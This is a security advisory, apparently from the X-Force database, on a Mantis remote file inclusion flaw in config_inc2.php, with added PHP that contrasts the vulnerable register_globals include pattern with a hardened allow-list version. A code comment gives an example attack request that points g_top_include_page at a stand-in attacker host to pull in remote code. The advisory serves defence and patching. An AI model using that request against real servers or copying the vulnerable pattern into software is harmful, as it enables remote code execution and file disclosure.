Mantis config_inc2.php could allow an attacker to modify variable values to read or include remote files

mantis-configinc-var-include (9900) The risk level is classified as Medium Risk.

Description:

Mantis could allow a remote attacker to execute code or view files on the server, caused by a vulnerability in the default/config_inc2.php script. The script fails to properly validate certain user-supplied variables: the $g_bottom_include_page, $g_top_include_page, $g_css_include_file and $g_meta_include_file configuration variables can be overridden by values supplied in a request (as query parameters, POST data or a cookie, when PHP's register_globals is enabled) and are then passed to include(). A remote attacker who sets any of these variables in a request to the login_page.php script could specify a remote malicious PHP file to execute arbitrary code, or a local file path to view files on the server.
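The following PHP is an added illustration of the vulnerability class described above; it is not Mantis source code. It shows the register_globals include pattern that lets a request pre-seed a configuration variable used by include(), beside a hardened version that assigns configuration unconditionally and resolves includes from a fixed allow-list. All file paths and the page keys are hypothetical; only the four variable names come from the advisory.

```php
<?php
// Added illustration (not Mantis source): the register_globals include
// pattern behind this advisory, and a hardened replacement.  File and
// variable names other than the four from the advisory are hypothetical.

// ---- Vulnerable pattern -------------------------------------------------
// Under PHP 4 with register_globals=On, a request such as
//   login_page.php?g_top_include_page=http://attacker.example/evil.txt
// (or the same name in a POST body or cookie) creates $g_top_include_page
// before any application code runs.  A configuration file that only fills
// in a default when the variable is still unset therefore keeps the
// attacker's value, which then reaches include().
function vulnerable_top_include()
{
    global $g_top_include_page;
    if (!isset($g_top_include_page)) {          // already set by the request
        $g_top_include_page = 'default/top.php';
    }
    include $g_top_include_page;                 // remote URL => code execution,
                                                 // local path => file disclosure
}

// ---- Hardened pattern ---------------------------------------------------
// 1. Assign every configuration variable unconditionally so a request can
//    never pre-seed it, and run with register_globals=Off regardless.
// 2. Never pass a user-controlled string to include(); map a short page
//    key onto a fixed allow-list of local files instead.
// 3. Reject stream wrappers and traversal outright as a second line of
//    defence, and set allow_url_fopen=Off in php.ini so a slip elsewhere
//    cannot fetch remote code.
$g_top_include_page = 'default/top.php';         // unconditional, request value discarded

function is_unsafe_include_value($value)
{
    // Any stream wrapper (http://, ftp://, php://, data: ...), directory
    // traversal or an embedded NUL marks the value as attacker-shaped.
    return (bool) preg_match('#^[a-z][a-z0-9+.\-]*:#i', $value)
        || strpos($value, '..') !== false
        || strpos($value, "\0") !== false;
}

function safe_include_page($key)
{
    // Hypothetical allow-list: the key is the only thing taken from the
    // caller, and it selects a path the application itself wrote.
    $allowed = array(
        'top'    => __DIR__ . '/default/top.php',
        'bottom' => __DIR__ . '/default/bottom.php',
        'css'    => __DIR__ . '/default/css.php',
        'meta'   => __DIR__ . '/default/meta.php',
    );
    if (!isset($allowed[$key])) {
        return false;                            // unknown key: include nothing
    }
    include $allowed[$key];
    return true;
}
```

Call safe_include_page('top') where the page used to include $g_top_include_page; a request that tries to substitute a URL or an absolute path now has no variable to override, and an unknown key simply returns false. is_unsafe_include_value() is a belt-and-braces check for any remaining code path that still builds an include target from a string.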


Consequences:

Gain Access

Remedy:

Upgrade to the latest version of Mantis (0.17.4a or later), available from the Mantis Web page. See References.

For Debian GNU/Linux 3.0 (woody):
Upgrade to the latest version of Mantis (0.17.1-2.1 or later), as listed in DSA-153-1. See References.

For other distributions:
Contact your vendor for upgrade or patch information.

References:

  • Mantis Advisory/2002-05: Arbitrary code execution and file reading.
  • Mantis Web site: Mantis.
  • BID-5509: Mantis Configuration Remote File Include Command Execution Vulnerability
  • CVE-2002-1114: config_inc2.php in Mantis before 0.17.4 allows remote attackers to execute arbitrary code or read arbitrary files via the parameters (1) g_bottom_include_page, (2) g_top_include_page, (3) g_css_include_file, (4) g_meta_include_file, or (5) a cookie.
  • DSA-153: mantis -- cross site code execution and privilege escalation

Platforms Affected:

  • Debian Linux 3.0
  • Mantis 0.17.0 to 0.17.3

Reported:

Aug 19, 2002

The information within this database may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (IBM Internet Security Systems X-Force) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

For corrections or additions please email xforce@iss.net